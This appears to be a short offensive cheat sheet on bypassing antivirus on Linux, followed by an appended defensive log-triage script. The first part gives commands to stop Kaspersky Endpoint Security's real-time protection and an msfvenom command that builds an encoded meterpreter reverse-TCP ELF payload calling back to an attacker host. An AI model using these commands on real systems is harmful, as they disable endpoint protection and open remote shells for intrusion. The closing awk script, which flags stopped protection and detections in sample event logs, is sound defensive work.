Bypass AV Linux

Kaspersky Endpoint Security

Turn off real-time protection:

If we don't turn it off, the AV will delete our file instantly.

sudo kesl-control --stop-t 1

# start it again
sudo kesl-control --start-t 1

If the file is still deleted, use GPG.

Metasploit payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=10.10.x.y -e x64/zutto_dekiru -f elf -o shell64zutto.elf

Review the Kaspersky event log:

sudo kesl-control -E --query | grep DetectName
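The same event log is what a defender reviews to spot that task 1 was stopped and what was detected around it. The script below is an added example, not part of the original notes. It assumes the query output consists of blank-line-separated `Key=Value` records and that the fields `EventType`, `Date`, `TaskId`, `TaskState` and `FileName` exist with the values shown (only `DetectName` appears on this page); the sample events are constructed.

```shell
#!/bin/sh
# Added example: triage of KESL event output. Record layout and all field
# names except DetectName are assumptions; verify against a real export.

# Constructed sample events (not real output).
sample_events() {
cat <<'EOF'
EventType=TaskStateChanged
Date=2024-01-10 09:14:02
TaskId=1
TaskState=Stopped

EventType=ThreatDetected
Date=2024-01-10 09:20:45
FileName=/tmp/sample.bin
DetectName=EXAMPLE.Constructed.Name

EventType=TaskStateChanged
Date=2024-01-10 09:31:10
TaskId=1
TaskState=Started
EOF
}

# Reads events on stdin and prints one finding per line:
# task 1 stopped or restored, every detection, and a final
# warning if task 1 was never started again.
kesl_triage() {
    awk -v RS='' -F'\n' '
    {
        split("", f)                      # clear fields of the previous event
        for (i = 1; i <= NF; i++) {
            p = index($i, "=")
            if (p > 1) f[substr($i, 1, p - 1)] = substr($i, p + 1)
        }
        if (f["EventType"] == "TaskStateChanged" && f["TaskId"] == "1") {
            if (f["TaskState"] == "Stopped") {
                off = f["Date"]; print "PROTECTION_STOPPED " off
            } else if (f["TaskState"] == "Started" && off != "") {
                print "PROTECTION_RESTORED " f["Date"]; off = ""
            }
        }
        if ("DetectName" in f)
            print "DETECTION " f["Date"] " " f["DetectName"] " " f["FileName"]
    }
    END { if (off != "") print "PROTECTION_STILL_OFF since " off }'
}

sample_events | kesl_triage
```

On a host, pipe the real query output into `kesl_triage` instead of `sample_events`.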
